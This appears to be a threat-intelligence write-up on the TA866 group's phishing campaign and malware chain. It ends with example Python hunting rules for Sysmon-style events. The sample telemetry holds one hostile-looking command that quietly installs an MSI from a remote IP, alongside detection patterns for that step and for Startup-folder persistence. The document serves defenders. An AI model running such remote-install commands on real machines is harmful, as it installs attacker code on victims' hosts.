TA866: A Financially Motivated Group with a Custom Toolset
Proofpoint is tracking a cluster of financially motivated threat activity targeting organizations in the United States and Germany as the threat actor TA866. Proofpoint researchers report that the actor has been active since October 2022 and uses phishing emails to distribute information-stealing malware. TA866's email volume grew steadily from one or two emails on a given day to tens of thousands by late January 2023. Proofpoint characterizes TA866 as an organized and sophisticated actor capable of performing "well thought-out attacks at scale based on their availability of custom tools; ability and connections to purchase tools and services from other vendors; and increasing activity volumes."

TA866's toolset consists of WasabiSeed, a malware downloader and installer; Screenshotter, a screenshot utility; AHK Bot, an AutoHotKey-based bot that downloads additional AutoHotKey scripts; and the Rhadamanthys information stealer. The operators periodically review what WasabiSeed and Screenshotter have collected to evaluate the value of the target, and that assessment determines the next step: capturing more screenshots with Screenshotter and/or executing AHK Bot to proceed to the next phase of the attack. Comments and variable names in TA866's tools are written in Russian.
TA866's attack chain begins when the victim opens a weaponized URL or attachment in the phishing email, which retrieves a malicious JavaScript file. TA866 has been observed using a traffic distribution system (TDS) to filter and route victims to its payloads. When executed, the JavaScript retrieves and launches an MSI package that installs WasabiSeed. WasabiSeed downloads and installs Screenshotter and any additional payloads, and establishes persistence by adding an autorun shortcut to the Windows Startup folder. AHK Bot and the Rhadamanthys stealer are dropped only once TA866 judges the victim worth pursuing further. As assessed by Proofpoint, the "use of Screenshotter to gather information on a compromised host before deploying additional payloads indicates the threat actor is manually reviewing infections to identify high-value targets. The AD profiling is especially concerning as follow-on activities could lead to compromises on all domain-joined hosts." The AD profiling referred to is carried out by an AHK Bot component that determines whether the infected host is joined to an Active Directory domain.
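As an added illustration of how a defender might hunt for the chain summarized above, the following Python is example code written for this page, not Proofpoint's tooling or anything recovered from TA866. It encodes three of the observable stages (a script host spawning msiexec, msiexec fetching a package from a URL, and a .lnk being written into a user's Startup folder) as rules over Sysmon-style process-create and file-create events, then correlates per host so that a single noisy rule is not enough to raise an alert. The event field names, the assumed shape of the msiexec command line, and the sample telemetry are all constructed assumptions for the example.

```python
"""Hunting rules for the TA866-style infection chain (added example, constructed data)."""
import re
from collections import defaultdict
from dataclasses import dataclass

SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
# Per-user Startup folder, matched case-insensitively anywhere in the path.
STARTUP_DIR = re.compile(r"\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\", re.I)
# Assumed shape of a remote install: msiexec /i "http(s)://..." (assumption, not a TA866 IOC).
REMOTE_MSI = re.compile(r"/i\s+\"?https?://", re.I)


@dataclass
class Event:
    ts: float                 # seconds since epoch (constructed values below)
    host: str
    event_id: int             # Sysmon-style IDs: 1 = process create, 11 = file create
    image: str = ""           # event 1: child process path
    parent_image: str = ""    # event 1: parent process path
    command_line: str = ""    # event 1
    target_filename: str = "" # event 11


def basename(path: str) -> str:
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def script_host_spawns_msiexec(ev: Event) -> bool:
    """JS dropper stage: wscript/cscript launching the MSI installer."""
    return (ev.event_id == 1
            and basename(ev.parent_image) in SCRIPT_HOSTS
            and basename(ev.image) == "msiexec.exe")


def msiexec_installs_remote_package(ev: Event) -> bool:
    """msiexec pulling a package straight from a URL (assumed command-line shape)."""
    return (ev.event_id == 1
            and basename(ev.image) == "msiexec.exe"
            and REMOTE_MSI.search(ev.command_line) is not None)


def startup_shortcut_created(ev: Event) -> bool:
    """Persistence stage: a shortcut written into a user's Startup folder."""
    return (ev.event_id == 11
            and ev.target_filename.lower().endswith(".lnk")
            and STARTUP_DIR.search(ev.target_filename) is not None)


RULES = {
    "script_host_spawns_msiexec": script_host_spawns_msiexec,
    "msiexec_remote_package": msiexec_installs_remote_package,
    "startup_shortcut_created": startup_shortcut_created,
}


def hunt(events):
    """Return (host, rule_name, ts) for every event that matches a rule."""
    return [(ev.host, name, ev.ts)
            for ev in events for name, rule in RULES.items() if rule(ev)]


def correlate(hits, window=900):
    """Hosts where at least two distinct rules fired within `window` seconds.
    Any one rule fires on legitimate admin activity; the chain is the signal."""
    by_host = defaultdict(list)
    for host, name, ts in hits:
        by_host[host].append((ts, name))
    flagged = {}
    for host, items in by_host.items():
        items.sort()
        for t0, _ in items:
            names = {n for t, n in items if t0 <= t <= t0 + window}
            if len(names) >= 2:
                flagged[host] = sorted(names)
                break
    return flagged


# Constructed sample telemetry; not from any real incident.
SAMPLE_EVENTS = [
    Event(1000.0, "WS-01", 1, image=r"C:\Windows\System32\msiexec.exe",
          parent_image=r"C:\Windows\System32\wscript.exe",
          command_line=r'msiexec /i "https://203.0.113.10/setup.msi" /q'),
    Event(1045.0, "WS-01", 11, target_filename=r"C:\Users\alice\AppData\Roaming"
          r"\Microsoft\Windows\Start Menu\Programs\Startup\update.lnk"),
    # Benign: an administrator installing a local package from cmd.exe.
    Event(2000.0, "WS-02", 1, image=r"C:\Windows\System32\msiexec.exe",
          parent_image=r"C:\Windows\System32\cmd.exe",
          command_line=r'msiexec /i "C:\Temp\tool.msi" /qn'),
    # Benign: a shortcut created outside the Startup folder.
    Event(2100.0, "WS-02", 11, target_filename=r"C:\Users\bob\Desktop\Notepad.lnk"),
]

if __name__ == "__main__":
    for hit in hunt(SAMPLE_EVENTS):
        print("hit:", hit)
    print("flagged:", correlate(hunt(SAMPLE_EVENTS)))
```

Only WS-01 is flagged: both of its events match, while the administrator's local msiexec run and the desktop shortcut on WS-02 match nothing. In a real deployment the rules would be fed from the SIEM rather than an inline list, and the window should be tuned to the gap between the JavaScript stage and WasabiSeed writing its Startup shortcut on your own telemetry.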